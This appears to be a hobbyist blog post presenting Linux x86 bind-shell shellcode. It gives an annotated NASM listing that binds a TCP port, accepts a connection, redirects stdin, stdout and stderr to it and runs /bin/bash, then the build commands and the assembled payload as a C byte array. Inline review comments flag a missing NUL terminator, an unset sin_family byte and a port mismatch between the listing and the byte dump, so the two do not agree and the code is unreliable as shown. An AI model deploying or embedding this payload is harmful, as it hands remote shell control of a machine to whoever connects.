in the name of zero

my linux port binding shellcode
 ; see portbind_c and portbind_asm
 
 
 ; stack layout
 ; [esp+0x0]  | struct sockaddr_in       |
 ; [esp+0x8]  | sys_socketcall args      |
 ; [esp+0x14] | (unused)                 |
 
        global _start
 section .text
 ; Flow: socket -> bind(0.0.0.0:port) -> listen -> accept -> dup2 x3 -> execve('/bin/bash').
 ; All scratch data lives in the 24 bytes reserved below esp. Note that struct sockaddr_in
 ; is 16 bytes (the addrlen passed to bind is 0x10), so the socketcall argument array at
 ; [esp+8] overlaps the struct's sin_zero padding, which bind does not interpret.
 ; No syscall return value is checked: a negative errno in eax would be carried on as if
 ; it were a descriptor or a zero result.
 _start:
        xor eax, eax                    ; eax = 0 (reused below as sin_addr and as the base for SOCK_STREAM)
        lea esp, [esp-24]               ; reserve 24 bytes of scratch space (lea does not touch flags)
        and esp, -16                    ; 16-byte align; the reserved bytes are NOT zeroed by this code
 
        mov byte [esp], 0x2             ; sockaddr_in.sin_family, low byte = AF_INET
                                        ; NOTE(review): sin_family is 16 bits and [esp+1] is never written.
                                        ; In this standalone binary the untouched stack below the entry esp
                                        ; is zero-filled, but in another execution context that byte may be
                                        ; stale and bind would then fail with EAFNOSUPPORT -- confirm
        mov dword [esp+4], eax          ; sockaddr_in.sin_addr.s_addr = 0 = INADDR_ANY
        mov word [esp+2], 0xDEAD        ; sockaddr_in.sin_port; the imm16 is stored little-endian (bytes AD DE)
                                        ; and sin_port is read in network byte order, so the kernel sees
                                        ; port 0xADDE (44510), not 0xDEAD. The byte dump further down this
                                        ; page shows \xed\xda here (0xDAED), i.e. a different build -- confirm
 
        ; sys_socket(AF_INET, SOCK_STREAM, 0) via socketcall(SYS_SOCKET, args)
        inc eax                         ; eax = 1
        mov [esp+12], eax               ; args[1] = SOCK_STREAM (1)
        inc eax                         ; eax = 2
        mov [esp+8], eax                ; args[0] = AF_INET (2)
        xor ebx, ebx                    ; ebx = 0
        mov [esp+16], ebx               ; args[2] = protocol 0
 
        inc ebx                         ; ebx = 1 = SYS_SOCKET
        lea ecx, [esp+8]                ; ecx = &args
        mov al, 102                     ; eax = 102 = sys_socketcall (upper 24 bits of eax are 0 here)
        int 0x80                        ; eax = listening socket fd (or -errno, unchecked)
 
        ; sys_bind(fd, &sockaddr_in, 16) via socketcall(SYS_BIND, args)
        mov edx, eax                    ; edx = socket fd, preserved across the following calls
        mov [esp+8], eax                ; args[0] = fd
        mov [esp+12], esp               ; args[1] = &sockaddr_in (the struct sits at [esp])
        mov byte [esp+16], 0x10         ; args[2] = addrlen 16; the dword's upper bytes are still 0 from above
        inc ebx                         ; ebx = 2 = SYS_BIND
        lea ecx, [esp+8] 
        mov al, 102                     ; relies on eax's upper 24 bits being 0, i.e. on a small fd value
        int 0x80                        ; eax = 0 on success
                  
        ; sys_listen(fd, 1) via socketcall(SYS_LISTEN, args)
        mov [esp+8], edx                ; args[0] = socket fd
        inc eax                         ; eax = 1, assuming bind returned 0
        mov [esp+12], eax               ; args[1] = backlog 1
        inc ebx                         ; ebx = 3 (SYS_CONNECT, skipped)
        inc ebx                         ; ebx = 4 = SYS_LISTEN
        lea ecx, [esp+8] 
        mov al, 102 
        int 0x80                        ; eax = 0 on success

        ; sys_accept(fd, NULL, NULL) via socketcall(SYS_ACCEPT, args); blocks until a client connects
        mov [esp+12], eax               ; args[1] = addr = 0 (eax is 0 after a successful listen)
        mov [esp+16], eax               ; args[2] = addrlen = 0; args[0] still holds the fd
        inc ebx                         ; ebx = 5 = SYS_ACCEPT
        lea ecx, [esp+8]
        mov al, 102
        int 0x80                        ; eax = connected client fd
 
        ; sys_dup2(client, 0/1/2): point stdin, stdout and stderr at the connection
        mov ebx, eax                    ; ebx = oldfd = client fd
        xor ecx, ecx                    ; ecx = newfd 0 = stdin
        mov al, 0x3f                    ; eax = 63 = sys_dup2 (eax's upper bytes are 0: small fd)
        int 0x80                        ; returns newfd in eax, so eax stays small for the next `mov al`
        inc ecx                         ; newfd 1 = stdout
        mov al, 0x3f
        int 0x80
        inc ecx                         ; newfd 2 = stderr
        mov al, 0x3f
        int 0x80
 
        jmp short .setup                ; jmp/call/pop idiom to obtain the address of the path string
 
 .payload:
        pop ebx                         ; ebx = return address pushed by `call` = address of '/bin/bash'
        xor edx, edx                    ; edx = envp = NULL
        mov [esp+4], ebx                ; argv[0] = path (the scratch dwords are reused here)
        mov [esp+8], edx                ; argv[1] = NULL
        xor eax, eax
        mov al, 11                      ; eax = 11 = sys_execve
        lea ecx, [esp+4]                ; ecx = argv
        int 0x80                        ; execve(path, argv, NULL); does not return on success
 
 .setup                                 ; label without a colon: NASM accepts it, `.setup:` is the usual form
        call .payload                   ; pushes the address of the bytes that follow
        db '/bin/bash'                  ; NOTE(review): no terminating 0 is emitted; execve needs a
                                        ; NUL-terminated path, so this relies on the byte that happens to
                                        ; follow in memory being zero (the C array below supplies one)
and i got to use my super handy dandy, lame disassembly-to-shellcode transcriber thingy (genshc) too!
steph@heaven ~/workdir $ nasm -f elf portbind_shellcode.asm
steph@heaven ~/workdir $ ld -s -o portbind_shellcode portbind_shellcode.o
steph@heaven ~/workdir $ objdump -d portbind_shellcode | ./genshc
/* Bytes produced by the objdump | genshc run above.  Two points when comparing with the
 * listing: (1) the 7-byte store \x66\xc7\x44\x24\x02\xed\xda near the start encodes
 * "mov word [esp+2], 0xDAED" (port 0xEDDA / 60890 in network order), whereas the listing
 * says 0xDEAD -- the listing and this dump appear to come from different builds; confirm
 * which is intended.  (2) The listing's '/bin/bash' carries no explicit terminator, so it
 * is the implicit NUL that C appends to this array that terminates the execve path.
 * The literal is shown split across lines for display only (as the author notes below)
 * and is not valid C as shown. */
char shellcode[]="\x31\xc0\x8d\x64\x24\xe8\x81\xe4\xf0\xff\xff\xff\xc6\x04
\x24\x02\x89\x44\x24\x04\x66\xc7\x44\x24\x02\xed\xda\x40\x89\x44\x24\x0c\x40\x89
\x44\x24\x08\x31\xdb\x89\x5c\x24\x10\x43\x8d\x4c\x24\x08\xb0\x66\xcd\x80\x89\xc2
\x89\x44\x24\x08\x89\x64\x24\x0c\xc6\x44\x24\x10\x10\x43\x8d\x4c\x24\x08\xb0\x66
\xcd\x80\x89\x54\x24\x08\x40\x89\x44\x24\x0c\x43\x43\x8d\x4c\x24\x08\xb0\x66\xcd
\x80\x89\x44\x24\x0c\x89\x44\x24\x10\x43\x8d\x4c\x24\x08\xb0\x66\xcd\x80\x89\xc3
\x31\xc9\xb0\x3f\xcd\x80\x41\xb0\x3f\xcd\x80\x41\xb0\x3f\xcd\x80\xeb\x15\x5b\x31
\xd2\x89\x5c\x24\x04\x89\x54\x24\x08\x31\xc0\xb0\x0b\x8d\x4c\x24\x04\xcd\x80\xe8
\xe6\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68";
(note that i reformatted the output: it's supposed to be a one-liner, but that would break the layout of my blog)

tidings, - steph